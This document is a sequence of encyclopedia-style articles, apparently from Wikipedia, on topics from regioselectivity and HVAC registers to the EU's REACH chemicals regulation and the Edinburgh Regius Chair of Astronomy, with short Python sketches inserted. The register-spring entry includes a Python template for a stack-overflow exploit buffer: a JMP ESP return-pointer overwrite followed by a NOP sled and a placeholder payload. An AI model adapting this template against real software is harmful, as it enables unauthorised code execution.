In organic chemistry , regioselectivity is the preference of chemical bonding or breaking in one direction over all other possible directions. [ 1 ] [ 2 ] It can often apply to which of many possible positions a reagent will affect, such as which proton a strong base will abstract from an organic molecule , or where on a substituted benzene ring a further substituent will be added.
A specific example is a halohydrin formation reaction with 2-propenylbenzene : [ 3 ]
Because of the preference for the formation of one product over another, the reaction is selective. This reaction is regioselective because it selectively generates one constitutional isomer rather than the other.
Various examples of regioselectivity have been formulated as rules for certain classes of compounds under certain conditions, many of which are named. Among the first introduced to chemistry students are Markovnikov's rule for the addition of protic acids to alkenes , and the Fürst-Plattner rule for the addition of nucleophiles to derivatives of cyclohexene , especially epoxide derivatives. [ 4 ] [ 5 ]
Regioselectivity in ring-closure reactions is subject to Baldwin's rules. If there are two or more orientations that can be generated during a reaction, one of them is usually dominant (e.g., Markovnikov versus anti-Markovnikov addition across a double bond).
Regioselectivity can also be applied to specific reactions such as addition to pi ligands .
Selectivity also occurs in carbene insertions , for example in the Baeyer-Villiger reaction. In this reaction, an oxygen is regioselectively inserted near an adjacent carbonyl group. In ketones , this insertion is directed toward the carbon which is more highly substituted (i.e. according to Markovnikov's rule). For example, in a study involving acetophenones , this oxygen was preferentially inserted between the carbonyl and the aromatic ring to give acetyl aromatic esters instead of methyl benzoates . [ 6 ] | https://en.wikipedia.org/wiki/Regioselectivity |
A register is a grille with moving parts, capable of being opened and closed and the air flow directed, which is part of a building's heating, ventilation, and air conditioning (HVAC) system. The placement and size of registers is critical to HVAC efficiency. Register dampers are also important, and can serve a safety function.
A grille is a perforated cover for an air duct (used for heating, cooling, or ventilation, or a combination thereof). Grilles sometimes have louvers which allow the flow of air to be directed. A register differs from a grille in that a damper is included. [ 1 ] [ 2 ] However, in practice, the terms grille , register , and return are often used interchangeably, and care must be taken to determine the meaning of the term used. [ 2 ] [ 3 ]
Placement of registers is key in creating an efficient HVAC system. Usually, a register is placed near a window or door, which is where the greatest heat/cooling loss occurs. [ 4 ] [ 5 ] In contrast, returns (grilled ducts which suck air back into the HVAC system for heating or cooling) are usually placed in the wall or ceiling nearest the center of the building. Generally, in rooms where it is critical to maintain a constant temperature two registers (one placed near the ceiling to deliver cold air, and one placed in the floor to deliver hot air) and two returns (one high, one low) will be used. HVAC systems generally have one register and one return per room. [ 4 ]
Registers vary in size with the heating and cooling requirements of the room. [ 5 ] If a register is too small, the HVAC system will need to push air through the ducts at a faster rate in order to achieve the desired heating or cooling. This can create rushing sounds which can disturb occupants or interfere with conversation or work (such as sound recording). The velocity of air through a register is usually kept low enough so that it is masked by background noise. (Higher ambient levels of background noise, such as those in restaurants, allow higher air velocities.) On the other hand, air velocity must be high enough to achieve the desired temperature. [ 6 ] Registers are a critical part of the HVAC system. If not properly installed and tightly connected to the ductwork, air will spill around the register and greatly reduce the HVAC system's efficiency. [ 5 ] Ideally, a room will have both heating and cooling registers. In practice, cost considerations usually require that heating and cooling be provided by the same register. In such cases, heating most often takes precedence over cooling, and registers are usually found close to the floor. [ 7 ]
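The size-versus-noise trade-off follows from the continuity relation: for a fixed volumetric airflow, the face velocity through a register is the airflow divided by the register's free area, so halving the area doubles the velocity. A minimal worked sketch; the 100 CFM airflow and the two free areas are illustrative assumptions, not values from any sizing standard:

```python
def face_velocity_fpm(airflow_cfm: float, free_area_sq_in: float) -> float:
    """Average face velocity in feet per minute for a given airflow (in cubic
    feet per minute) passing through a register's free area (in square inches)."""
    free_area_sq_ft = free_area_sq_in / 144.0  # 144 square inches per square foot
    return airflow_cfm / free_area_sq_ft

# Illustrative comparison: the same 100 CFM supply through two register sizes.
print(face_velocity_fpm(100, 40))  # 360 ft/min through the larger register
print(face_velocity_fpm(100, 20))  # 720 ft/min through a register half the size
```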
For heating purposes, a floor register is preferred. This is because hot air rises, and as it cools it falls. This creates good air circulation in a room, and helps to maintain a more even temperature as hot and cold air is mixed more thoroughly. [ 3 ] Floor registers generally have a grille strong enough for a human being to walk on without damaging the grille. It is rare to find a floor register installed less than 6 inches (15 cm) from the corner of a room. [ 8 ] When a floor register is not practical or desired, a wall register is used. The correct placement of wall heating registers is critical. Generally, the heating register will be directly across from an exterior window. The hot air from the register will mix with the cold air coming off the window, cool, and drop to the floor—creating good air circulation. However, the hot air must be pushed from the register with enough force (or "throw") so that it will cross the room and reach the window. If there is too little throw, the hot air will stop moving partway across the room, the cold air from the window will not be heated (creating the feeling of a cool draft), and air circulation will suffer. [ 9 ]
A register's damper provides a critical function. Primarily, the damper allows the amount of hot or cool air entering a room to be controlled, providing for more accurate control over room temperature. [ 7 ] Dampers also allow air to be shut off in unused rooms, improving the efficiency of the HVAC system. Dampers can also help adjust a HVAC system for seasonal use. [ 7 ] During winter months, for example, an air conditioning register can be closed to prevent cold air from being pulled from the room. This allows the hot air to mix more completely with the cold air in the room, improving the efficiency of the HVAC system. [ 7 ] (The return should be efficient enough to draw off the cooler air.) [ 10 ] [ 11 ]
Some registers, particularly those in commercial buildings or institutions which house large numbers of people (such as hotels or hospitals) have a fire damper attached to them. This damper automatically senses smoke or extreme heat, and shuts the register closed so that fire and smoke do not travel throughout the building via the HVAC system. [ 12 ] | https://en.wikipedia.org/wiki/Register_(air_and_heating) |
The Register of Antarctic Marine Species , also known as RAMS , is a taxonomic database that provides a list of marine species found in the Southern Ocean surrounding Antarctica . [ 1 ] [ 2 ]
Its purpose is to provide authoritative and comprehensive information on the diversity of marine life in the region, which provides a reference point for marine science, research, conservation and sustainable management. [ 3 ] The database includes marine species found on the sea floor, in the water column, and around sea-ice. [ 4 ] RAMS is a regionally-focused database within the World Register of Marine Species . [ 1 ] | https://en.wikipedia.org/wiki/Register_of_Antarctic_Marine_Species |
In computer security , a register spring is a sort of trampoline . It is a bogus return pointer or Structured Exception Handling (SEH) pointer which an exploit places on the call stack , directing control flow to existing code (within a dynamic-link library (DLL) or the static program binary). This target code in turn consists of a call or jump such as "CALL EBX" or "JMP ESP", where the appropriate processor register was previously prepared by the exploit to point to where the payload code begins. | https://en.wikipedia.org/wiki/Register_spring |
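A minimal sketch of how an exploit might lay out such a payload, written in Python for illustration. Everything specific here is a hypothetical assumption rather than something drawn from a real program: the 64-byte buffer size, the address 0x625011AF for a "JMP ESP" gadget inside some loaded DLL, and the placeholder payload. The exact padding needed to reach the saved return pointer also varies with the target.

```python
import struct

# Hypothetical values for illustration only.
BUFFER_SIZE = 64                  # assumed size of the overflowable stack buffer
JMP_ESP_ADDRESS = 0x625011AF      # assumed address of a "JMP ESP" register spring

# Placeholder payload; a real exploit would place shellcode here.
PAYLOAD = b"\x90" * 16 + b"\xcc"  # NOP sled followed by an INT3 breakpoint

def build_exploit_buffer() -> bytes:
    """Overflow the buffer, overwrite the saved return pointer with the
    address of the JMP ESP gadget, and append the payload.

    When the vulnerable function returns, control transfers to the gadget;
    JMP ESP then lands in the bytes just past the overwritten return
    address, which is where the payload begins."""
    padding = b"A" * BUFFER_SIZE                      # fill the local buffer
    fake_return = struct.pack("<I", JMP_ESP_ADDRESS)  # little-endian 32-bit pointer
    return padding + fake_return + PAYLOAD

if __name__ == "__main__":
    print(build_exploit_buffer().hex())
```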
Registration, Evaluation, Authorisation and Restriction of Chemicals ( REACH ) is a European Union regulation dating from 18 December 2006, [ 1 ] amended on 16 December 2008 by Regulation (EC) No 1272/2008. [ 2 ] REACH addresses the production and use of chemical substances , and their potential impacts on both human health and the environment. Its 849 pages took seven years to pass, and it has been described as the most complex legislation in the Union's history [ 3 ] and the most important in 20 years. [ 4 ] It is the strictest law to date regulating chemical substances and will affect industries throughout the world. [ 5 ] REACH entered into force on 1 June 2007, with a phased implementation over the next decade. The regulation also established the European Chemicals Agency , which manages the technical, scientific and administrative aspects of REACH.
When REACH is fully in force, it will require all companies manufacturing or importing chemical substances into the European Union in quantities of one tonne or more per year to register these substances with a new European Chemicals Agency (ECHA) at Telakkakatu in Helsinki, Finland. Since REACH applies to some substances that are contained in objects (articles in REACH terminology), any company importing goods into Europe could be affected. [ 5 ]
The European Chemicals Agency has set three major deadlines for registration of chemicals. In general these are determined by tonnage manufactured or imported, with 1000 tonnes/a. being required to be registered by 1 December 2010, 100 tonnes/a. by 1 June 2013 and 1 tonne/a. by 1 June 2018. [ 6 ] In addition, chemicals of higher concern or toxicity also have to meet the 2010 deadline.
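Read as a rule, the phase-in deadline is determined by the annual tonnage band, with higher-concern substances pulled into the earliest phase regardless of tonnage. A minimal sketch of that rule using only the bands and dates stated above; the function name and the simple boolean flag for "higher concern" are illustrative simplifications of the actual hazard criteria:

```python
from datetime import date
from typing import Optional

def registration_deadline(tonnes_per_year: float,
                          higher_concern: bool = False) -> Optional[date]:
    """Return the REACH phase-in registration deadline for a substance.

    Substances of higher concern or toxicity fall under the 2010 deadline
    regardless of tonnage; below 1 tonne per year no registration is required.
    """
    if tonnes_per_year < 1:
        return None
    if higher_concern or tonnes_per_year >= 1000:
        return date(2010, 12, 1)
    if tonnes_per_year >= 100:
        return date(2013, 6, 1)
    return date(2018, 6, 1)

print(registration_deadline(250))       # 2013-06-01
print(registration_deadline(5, True))   # 2010-12-01
```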
About 143,000 chemical substances marketed in the European Union were pre-registered by the 1 December 2008 deadline. Although pre-registering was not mandatory, it allows potential registrants much more time before they have to fully register. Supply of substances to the European market which have not been pre-registered or registered is illegal (known in REACH as "no data, no market").
REACH also addresses the continued use of chemical substances of very high concern (SVHC) because of their potential negative impacts on human health or the environment. From 1 June 2011, the European Chemicals Agency must be notified of the presence of SVHCs in articles if the total quantity used is more than one tonne per year and the SVHC is present at more than 0.1% of the mass of the object. Some uses of SVHCs may be subject to prior authorisation from the European Chemicals Agency, and applicants for authorisation will have to include plans to replace the use of the SVHC with a safer alternative (or, if no safer alternative exists, the applicant must work to find one) – known as substitution. As of 23 July 2021, there were 219 SVHCs on the candidate list for authorisation. [ 7 ]
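The notification obligation can be read as a two-part threshold test on quantity and concentration. A minimal sketch using the figures stated above (one tonne per year and 0.1% of the mass of the object); the function name and inputs are illustrative and not part of any official tool:

```python
def svhc_notification_required(total_tonnes_per_year: float,
                               mass_fraction: float) -> bool:
    """Return True if an SVHC contained in articles must be notified to ECHA.

    total_tonnes_per_year: total quantity of the SVHC across the articles, in tonnes per year
    mass_fraction:         concentration of the SVHC in the article, as a weight fraction
    """
    return total_tonnes_per_year > 1.0 and mass_fraction > 0.001

# Example: 2.5 tonnes/year of an SVHC present at 0.5% w/w -> notification required
print(svhc_notification_required(2.5, 0.005))  # True
```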
REACH applies to all chemicals imported or produced in the EU. The European Chemicals Agency will manage the technical, scientific and administrative aspects of the REACH system.
To somewhat simplify the registration of the 143,000 substances and to limit vertebrate animal testing as far as possible, substance information exchange forums (SIEFs) are formed amongst legal entities (such as manufacturers, importers, and data holders) who are dealing with the same substance. [ 8 ] This allows them to join forces and finances to create one registration dossier. However, this creates a series of new problems, as a SIEF is a cooperation between sometimes a thousand legal entities that did not know each other at all before but suddenly must:
in order to complete a dossier covering several thousand endpoints in a limited time.
The European Commission supports businesses affected by REACH by handing out – free of charge – a software application ( IUCLID ) that simplifies capturing, managing, and submitting data on chemical properties and effects. Such submission is a mandatory part of the registration process . Under certain circumstances the performance of a chemical safety assessment (CSA) is mandatory and a chemical safety report (CSR) assuring the safe use of the substance has to be submitted with the dossier. Dossier submission is done using the web-based software REACH-IT .
The aim of REACH is to improve the protection of human health and the environment by identification of the intrinsic properties of chemical substances. At the same time, innovative capability and competitiveness of the EU chemicals industry should be enhanced. [ 9 ]
The European Commission's (EC) White Paper of 2001 on a 'future chemical strategy' proposed a system that requires chemicals manufactured in quantities of greater than 1 tonne to be 'registered', those manufactured in quantities greater than 100 tonnes to be 'evaluated', and certain substances of high concern (for example carcinogenic, mutagenic and toxic to reproduction – CMRs) to be 'authorised'.
The EC adopted its proposal for a new scheme to manage the manufacture, importation and supply of chemicals in Europe in October 2003. This proposal eventually became law once the European Parliament officially approved its final text of REACH. It came into force on 1 June 2007. [ 10 ]
One of the major elements of the REACH regulation is the requirement to communicate information on chemicals up and down the supply chain . This ensures that manufacturers, importers, and also their customers are aware of information relating to health and safety of the products supplied. For many retailers the obligation to provide information about substances in their products within 45 days of receipt of a request from a consumer is particularly challenging. Having detailed information on the substances present in their products will allow retailers to work with the manufacturing base to substitute or remove potentially harmful substances from products. The list of harmful substances is continuously growing and requires organizations to constantly monitor any announcements and additions to the REACH scope. This can be done on the European Chemicals Agency 's website.
A requirement is to collect, collate and submit data to the European Chemicals Agency (ECHA) on the hazardous properties of all substances (except Polymers and non-isolated intermediates) manufactured or imported into the EU in quantities above 1 tonne per year. Certain substances of high concern, such as carcinogenic, mutagenic and reproductive toxic substances (CMRs) will have to be authorised.
Chemicals will be registered in three phases according to the tonnage of the substance:
More than 1000 tonnes a year, or substances of highest concern, must be registered in the first 3 years;
100–1000 tonnes a year must be registered in the first 6 years;
1–100 tonnes a year must be registered in the first 11 years.
In addition, industry should prepare risk assessments and provide control measures for using the substance safely to downstream users. [ 10 ]
Evaluation provides a means for the authorities to require registrants, and in very limited cases downstream users, to provide further information.
There are two types of evaluation: dossier evaluation and substance evaluation:
Dossier evaluation is conducted by authorities to examine proposals for testing, to ensure that unnecessary animal tests and costs are avoided, and to check the compliance of registration dossiers with the registration requirements. Chemical companies failed to provide "important safety information" in nearly three quarters (74%, or 211 of 286) of cases checked by authorities, according to the European Chemicals Agency's 2018 annual progress report. "The numbers show a similar picture to previous years," it said. Industry group Cefic acknowledged the problem.
Substance evaluation is performed by the relevant authorities when there is a reason to suspect that a substance presents a risk to human health or the environment (e.g. because of its structural similarity to another substance). Therefore, all registration dossiers submitted for a substance are examined together and any other available information is taken into account. [ 10 ]
Substance evaluation is carried out under a programme known as the Community Rolling Action Plan ( CoRAP ). An independent review of progress by national officials published in late 2018 found that 352 substances have so far been prioritised for substance evaluation with 94 completed. For almost half the 94, officials concluded that existing commercial use of the substance is unsafe for human health and/or the environment. Risk management has been initiated for twelve substances since REACH came into force. For 74% of substances (34 out of 46), concerns were demonstrated, but no actual regulatory follow-up has yet been initiated. In addition, national officials concluded that 64% of the substances under evaluation (126 out of 196) lacked the information needed to demonstrate the safety of the chemicals marketed in Europe due to inadequate industry data.
REACH allows restricted substances of very high concern to continue being used, subject to authorisation.
This authorisation requirement attempts to ensure that risks from the use of such substances are either adequately controlled or justified by socio-economic grounds, having taken into account the available information on alternative substances or processes.
The Regulation enables restrictions of use to be introduced across the European Community where this is shown to be necessary. Member States or the Commission may prepare such proposals. [ 11 ]
By March 2019, authorisation had been granted 185 times , with no eligible request ever having been rejected. NGOs have complained that authorisations have been granted despite safer alternatives existing and that this was hindering substitution . In March 2019, the European Court of Justice revoked an authorisation in a ruling that criticised the European Chemicals Agency for failing to identify a safer alternative.
Manufacturers and importers should develop risk reduction measures for all known uses of the chemical, including downstream uses. Downstream users, such as plastic pipe producers, should provide details of their uses to their suppliers. In cases where downstream users decide not to disclose this information, they need to have their own CSR. [ 12 ]
REACH is the product of a wide-ranging overhaul of EU chemical policy. It passed the first reading in the European Parliament on 17 November 2005, and the Council of Ministers reached a political agreement for a common position on 13 December 2005. The European Parliament approved REACH on 13 December 2006 and the Council of Ministers formally adopted it on 18 December 2006. Weighing up expenditure versus profit has always been a significant issue, with the estimated cost of compliance being around €5 billion over 11 years, and the assumed health benefits of saved billions of euro in healthcare costs. [ 13 ] However, there have been different studies on the estimated cost which vary considerably in the outcome. It came into force on 20 January 2009, and will be fully implemented by 2015.
A separate regulation – the CLP Regulation (for "Classification, Labelling, Packaging") – implements the United Nations Globally Harmonized System of Classification and Labelling of Chemicals (GHS) and will steadily replace the previous Dangerous Substances Directive and Dangerous Preparations Directive .
The REACH regulation was amended in April 2018 to include specific information requirements for nanomaterials . [ 14 ]
In the European Green Deal of 2020, a commitment was made to update the REACH regulation to ban between 7,000 and 12,000 toxic substances in all consumer products, except where truly essential. The goal was among the priorities of the European Commission , but is in danger of being radically revised due to lobbying by the EU chemical industry and the positions taken by the European People's Party . [ 15 ]
The legislation was proposed under dual reasoning: protection of human health and protection of the environment .
Using potentially toxic substances (such as phthalates or brominated flame retardants ) is deemed undesirable and REACH will force the use of certain substances to be phased out. Using potentially toxic substances in products other than those ingested by humans (such as electronic devices ) may seem to be safe, but there are several ways in which chemicals can enter the human body and the environment. Substances can leave particles during consumer use, for example into the air where they can be inhaled or ingested. Even where they might not do direct harm to humans, they can contaminate the air or water, and can enter the food chain through plants, fish or other animals. According to the European Commission, little safety information exists for 99 percent of the tens of thousands of chemicals placed on the market before 1981. [ 5 ] There were 100,106 chemicals in use in the EU in 1981, when the last survey was performed. Of these only 3,000 have been tested and over 800 are known to be carcinogenic, mutagenic or toxic to reproduction. These are listed in the Annex 1 of the Dangerous Substances Directive (now Annex VI of the CLP Regulation ).
Continued use of many toxic chemicals is sometimes justified because "at very low levels they are not a concern to health". [ 16 ] However, many of these substances may bioaccumulate in the human body, thus reaching dangerous concentrations. They may also chemically react with one another, [ 17 ] producing new substances with new risks.
A number of countries outside of the European Union have started to implement REACH regulations or are in the process of adopting such a regulatory framework to approach a more globalized system of chemicals registration under the Globally Harmonized System of Classification and Labelling of Chemicals (GHS). [ 18 ] Balkan countries such as Croatia and Serbia are in the process of adopting the EU REACH system under the auspices of the EU IPA programme. Switzerland has moved towards implementation of REACH through partial revision of the Swiss Chemical Ordinance on February 1, 2009. The new Chemicals Management Regulation in Turkey is paving the way for the planned adoption of REACH in 2013. China has moved towards a more efficient and coherent system for the control of chemicals in compliance with GHS.
In the UK, the government announced a "UK REACH" that the UK's Chemical Industry Association described as a "hugely expensive duplication" of the EU's safety data. [ 19 ] The new regulations were to be enforced from October 2021 but deferred to October 2023, and then to October 2025. Following industry representations, the responsible Minister announced "that officials would now explore 'a new model' for UK REACH registrations that would look to 'reduce the need for replicating EU Reach data packages'". [ 19 ] In March 2021, a group of more than 20 leading UK organisations, including the CHEM Trust and Breast Cancer UK, "rejected industry proposals to streamline UK Reach as a 'major weakening' of the envisaged post-Brexit regime". [ 19 ]
Over a decade after REACH came into force, progress has been slow. Of the 100,000 chemicals used in Europe today, “only a small fraction has been thoroughly evaluated by authorities regarding their health and environmental properties and impacts, and even fewer are actually regulated,” according to a report for the European Commission.
Apart from the potential costs to industry and the complexity of the new law, REACH has also attracted concern because of animal testing . Animal tests on vertebrates are now required, but are allowed only once for each new substance and only if suitable alternatives cannot be used. If a company pays for such tests, it must sell the rights to the results for a "reasonable" price, which is not defined. There are additional concerns that access to the necessary information may prove very costly for potential registrants needing to purchase it.
On 8 June 2006, the REACH proposal was criticized by non-EU countries, including the United States, India and Brazil , which stated that the bill would hamper global trade. [ 20 ]
The cosmetics company Lush was critical of the legislation when it was first proposed in 2006, as it believed it would increase animal testing . The company wrote to its European customers and also ran an in-store marketing campaign, asking for postcards objecting to the legislation to be sent to MEPs , a move which resulted in 80,000 Lush customers sending postcards. [ 21 ] In December 2006, Lush protested outside the European Parliament in Strasbourg by dumping horse manure outside the building. [ 22 ]
An opinion in Nature in 2009 by Thomas Hartung and Constanza Rovida estimated that 54 million vertebrate animals would be used under REACH and that the costs would amount to €9.5 billion, set against the annual European industry turnover of €507 billion. [ 23 ] Hartung is the former head of the European Centre for the Validation of Alternative Methods (ECVAM). [ citation needed ] In a news release, ECHA criticised assumptions made by Hartung and Rovida; ECHA's alternative assumptions reduced the estimated number of animals sixfold. [ 24 ]
Only representatives are EU-based entities that must comply with REACH (Article 8) and should operate standard, transparent working practices. The Only Representative assumes responsibility and liability for fulfilling obligations of importers in accordance with REACH for substances being brought into the EU by a non-EU manufacturer.
Non-EU consultancies offer "only representative" services, though according to REACH it is not possible to register a substance if your "only representative" consultancy company is not based in the EU, unless it is subcontracted to an EU-based registrant.
The SIEFs will bring new challenges. An article in the business news service Chemical Watch described how some "pre-registrants" may simply be consultants hoping for work ("gold diggers") while others may be aiming to charge exorbitant rates for the data they have to offer ("jackals"). [ 25 ]
The European Chemicals Agency (ECHA) has published the REACH Authorisation List, [ 28 ] in an effort to tighten the use of Substances of Very High Concern (SVHCs). The list is an official recommendation from the ECHA to the European Commission . The list is regularly updated and expanded. Currently the Candidate List for Authorisation comprises a total of 233 SVHCs (see ECHA list at https://echa.europa.eu/candidate-list-table ), some of which are already included on the Authorisation List.
To sell or use these substances, manufacturers, importers, and retailers in the European Union (EU) must apply for authorization from the ECHA . The applicant is to submit a chemical safety report on the risks entailed by the substance, as well as an analysis of possible alternative substances or technologies including present and future research and development processes. | https://en.wikipedia.org/wiki/Registration,_Evaluation,_Authorisation_and_Restriction_of_Chemicals
The Registry of Standard Biological Parts is a collection of genetic parts that are used in the assembly of systems and devices in synthetic biology . The registry was founded in 2003 at the Massachusetts Institute of Technology . The registry, as of 2018, contains over 20,000 parts. Recipients of the genetic parts include academic labs, established scientists, and student teams participating in the iGEM Foundation 's annual synthetic biology competition. [ 1 ]
The Registry of Standard Biological Parts conforms to the BioBrick standard, a standard for interchangeable genetic parts. BioBrick was developed by a nonprofit composed of researchers from MIT , Harvard , and UCSF . The registry offers genetic parts with the expectation that recipients will contribute data and new parts to improve the resource. The registry records and indexes biological parts and offers services including the synthesis and assembly of biological parts, systems, and devices.
The registry offers many types of biological parts, including DNA , plasmids , plasmid backbones, primers , promoters , protein coding sequences, protein domains , ribosomal binding sites , terminators , translational units, riboregulators , and composite parts. [ 2 ] It also includes devices such as protein generators, reporters , inverters , receptors , senders, and measurement devices. A key idea that motivated the development of the Registry was to develop an abstraction hierarchy implemented through the parts categorization system. [ 3 ]
The registry has previously received external funding through grants from the National Science Foundation , the Defense Advanced Research Projects Agency , and the National Institutes of Health . | https://en.wikipedia.org/wiki/Registry_of_Standard_Biological_Parts |
Registry of Toxic Effects of Chemical Substances ( RTECS ) is a database of toxicity information compiled from the open scientific literature without reference to the validity or usefulness of the studies reported. Until 2001 it was maintained by the US National Institute for Occupational Safety and Health (NIOSH) as a freely available publication. It is now maintained by the private company BIOVIA . [ 1 ]
Six types of toxicity data are included in the file: [ 2 ]
Specific numeric toxicity values such as LD 50 , LC 50 , TDLo , and TCLo are noted as well as species studied and the route of administration used. For all data the bibliographic source is listed. The studies are not evaluated in any way.
RTECS was an activity mandated by the US Congress , established by Section 20(a)(6) of the Occupational Safety and Health Act of 1970 (PL 91-596). [ 3 ] The original edition, known as the Toxic Substances List was published on June 28, 1971, and included toxicological data for approximately 5,000 chemicals . The name changed later to its current name Registry of Toxic Effects of Chemical Substances . [ 4 ] In 2000, NIOSH solicited proposals to transfer the RTECS trademark and database to a private company, [ 4 ] and in December 2001 RTECS was transferred from NIOSH to the private company MDL , a subsidiary of Elsevier . [ 5 ] Through a series of acquisitions and mergers, Dassault Systèmes acquired the database and, as of 2025, licenses RTECS through its BIOVIA brand.
RTECS is also available through third-party distributors such as the Canadian Centre for Occupational Health and Safety , which sells licenses for English and French versions of RTECS. [ 6 ] | https://en.wikipedia.org/wiki/Registry_of_Toxic_Effects_of_Chemical_Substances
The Regius Chair of Astronomy is one of eight Regius Professorships at the University of Edinburgh , and was founded in 1785. Regius Professorships are those that have in the past been established by the British Crown , and are still formally appointed by the current monarch, although they are advertised and recruited by the relevant university following the normal processes for appointing a professorship.
The Regius Chair of Astronomy in Edinburgh is unusual because of its relationship with the position of the Astronomer Royal for Scotland , and the Royal Observatory Edinburgh (ROE) . Between 1834 and 1990, the Regius Professor at the University, the Astronomer Royal, and the Director of the Royal Observatory were all the same person. This is no longer true however, as explained under "New Structure" below.
Astronomy was originally taught in Edinburgh by the Chairs of Mathematics and of Natural Philosophy. [ 1 ] [ 2 ] A Chair of Practical Astronomy was established in 1785 by a Royal Warrant signed by George III. The first holder was Robert Blair , who held the position until his death in 1828. However, he was never provided with an observatory or any instruments, and refused to do any teaching, seeing the position as a sinecure. [ 3 ] At that time, the Royal Commission was reviewing Scottish Universities and recommended that the chair should not be filled 'until a suitable observatory... could be established' [ 3 ]
Meanwhile, outside the University, the Edinburgh Astronomical Institution , a club of private individuals, had succeeded in building an observatory on Calton Hill in a new building designed by William Playfair . In 1822 the Institution presented a loyal address to George IV, resulting in the observatory being granted the title of Royal Observatory. After considerable delay and negotiation, in 1834 Thomas Henderson was appointed as both the first Astronomer Royal for Scotland and the second Regius Professor. He remained in both positions until he died in 1844. Thomas Henderson's main claim to fame is being, along with Friedrich Bessel , the first astronomer to measure the parallax of a star , and hence a reliable stellar distance. He made his measurements at the Cape of Good Hope and reduced the data after taking up his position in Edinburgh. [ 3 ]
In 1846 Charles Piazzi Smyth became Regius Professor and Astronomer Royal, and held both positions until he retired in 1888. He was the first Regius Professor to actually provide lectures in Astronomy, sixty five years after the founding of the chair. [ 2 ] Piazzi Smyth had a long and full career, including the establishment of a public time service via the Time Ball and the One O'Clock Gun, the exploration of the idea of mountain top astronomy, the investigation of the spectra of the Sun, the Zodiac and the Aurora, and innovative developments in photography. [ 4 ] Later in his life he became obsessed with mystical interpretations of the Pyramids.
Following the retirement of Piazzi Smyth, both the future of the Royal Observatory and the Regius Professorship were once again thrown into uncertainty by a Royal Commission on Scottish Universities, until the generous gift of Lord Lindsay led to the creation of a new Royal Observatory building on Blackford Hill (see [ 3 ] for extensive detail), and Ralph Copeland was appointed as fourth Regius Professor and third Astronomer Royal. Copeland was well known for spectroscopic observations of planets, comets, and nebulae, and was the first person to observe Helium outside the Sun. He also carried out extensive travel, both to observe transits of Venus, and to continue Piazzi Smyth's researches into mountain top astronomy.
Copeland died in 1905 and was replaced both as Regius Professor and as Astronomer Royal by Frank Dyson . He was the first Regius Professor whose title was simply "Chair of Astronomy" rather than "Chair of Practical Astronomy". He investigated the spectrum of the solar corona and chromosphere. In 1910 he left to become Director of the Royal Greenwich Observatory and (English) Astronomer Royal - the only astronomer to have held both Astronomer Royal positions. He later became famous for organising eclipse expeditions which helped to prove Einstein's General Relativity Theory, and for instigating the transmission of the "pips" from the Greenwich Observatory to the BBC.
In 1910 Dyson was replaced by Ralph Sampson . Before coming to Edinburgh Sampson was well known for pioneering work on the colour temperature of stars, and a theory of the motions of the Galilean satellites. After his appointment, his work took a very practical turn, aiming at producing a more accurate time service, improving the optical performance of telescopes, and developing a recording microphotometer and techniques for performing spectrophotometry of stars. He also led the construction of the 36-inch telescope which still sits in the East Tower of the ROE. Sampson retired in 1937, to be replaced by W.M.H. Greaves in 1938. Greaves kept the national time service going through the war, and led extensive work on determining the temperatures of stars, and the physical properties of their atmospheres, using spectrophotometry, as well as studies of the effect of sunspots on terrestrial magnetism. He died suddenly in 1955, and was replaced as both Regius Professor and Astronomer Royal by Hermann Bruck .
During the 1960s and 1970s, the ROE underwent considerable expansion, so that technical and scientific contributions are properly seen as due to a whole community. Nonetheless, it is possible to discern clear themes in the leadership of successive astronomers.
Hermann Bruck was the most important historical figure for Edinburgh astronomy, at least in leadership terms. When he arrived in 1957 the observatory had six scientific staff. By the time he retired in 1975, there were over a hundred, and the observatory was established as a major international centre. There were three main themes to his leadership. The first, together with his wife Mary Bruck (née Conway), was the creation of the first full Astrophysics degree, and the expansion of first year astronomy teaching to large classes of students from many disciplines. The second theme was automation - both computerised data reduction, and the creation of automated measuring machines, which led to a sequence of machines which scanned and digitised photographic plates - GALAXY, COSMOS, and SuperCOSMOS. The third theme was the development of mountaintop overseas observatories, fulfilling the dreams of Piazzi Smyth. This work began with the creation of a station at Monte Porzio in Italy, followed by the design of a Northern Hemisphere Observatory in La Palma (which was then implemented by the Royal Greenwich Observatory), the building and operation of the UK Schmidt Telescope in Australia, and finally the building and operation of the infra-red specialised UK Infrared Telescope ( UKIRT ) in Hawaii. Bruck retired in 1975.
The next holder of both the Regius Professorship and the Astronomer Royal position was Vincent Reddish , who had been at ROE since the 1960s, and in fact was to a large extent responsible for many of the advances in the Bruck era - automation, systematic sky surveys, and the creation of the UK Schmidt Telescope and UKIRT . He resigned in 1978 and concentrated on his controversial private researches into dowsing .
Malcolm Longair was appointed to the joint position in 1980, and continued the trends started by Bruck and Reddish of making the Royal Observatory Edinburgh a centre of astronomical technology and sky survey work. Under Longair's leadership the ROE created a radical new facility, the James Clerk Maxwell Telescope ( JCMT ), and built a series of ground-breaking instruments for both ground-based and space-based facilities. University leadership in Astronomy was however largely delegated to Mary Bruck and Peter Brand, under whom the Department of Astronomy merged with the Department of Physics, and was re-named the Institute for Astronomy. Longair resigned in 1990, during a difficult period of political discussion over the structure of British Astronomy, and moved to the Cavendish Laboratory in Cambridge.
Here "ARn" refers to the holder also being the n'th Astronomer Royal for Scotland. In al those cases, the date of holding the Astronomer Royal position are the same as for holding the Regius chair. | https://en.wikipedia.org/wiki/Regius_Professor_of_Astronomy_(Edinburgh) |
A reglet is found on the exterior of a building along a masonry wall, chimney or parapet that meets the roof . It is a groove cut within a mortar joint that receives counter-flashing meant to cover surface flashing used to deflect water infiltration. Reglet can also refer to the counter-flashing itself when it is applied on the surface, known as "face reglet" or "reglet-flashing".
The reglet is typically created with a grinder or masonry cutting saw that cuts 3/4" to 1-1/2" deep into a mortar joint between two bricks. [ 1 ] The counter-flashing is then inserted into the reglet and held in place with a thin metal wedge covered with a sealant.
A face reglet (also known as reglet-flashing) is counter-flashing that is typically made out of either copper or lead-coated copper. [ 2 ] It is applied on the surface of the wall or parapet and screwed into place, with additional sealant placed between the surface and the counter-flashing. [ 3 ] It is easily removable for roof repair and flashing replacements.
A face reglet can also be called a raggle [ 4 ] and may be related to regle , a groove.
| https://en.wikipedia.org/wiki/Reglet
Regnal numbers are ordinal numbers , often written as Roman numerals , used to distinguish among persons with the same name who held the same office. Most importantly, they are used to distinguish monarchs or popes . An ordinal is the number placed after a monarch's regnal name to differentiate between a number of popes, kings, queens or princes reigning over the same territory with the same regnal name.
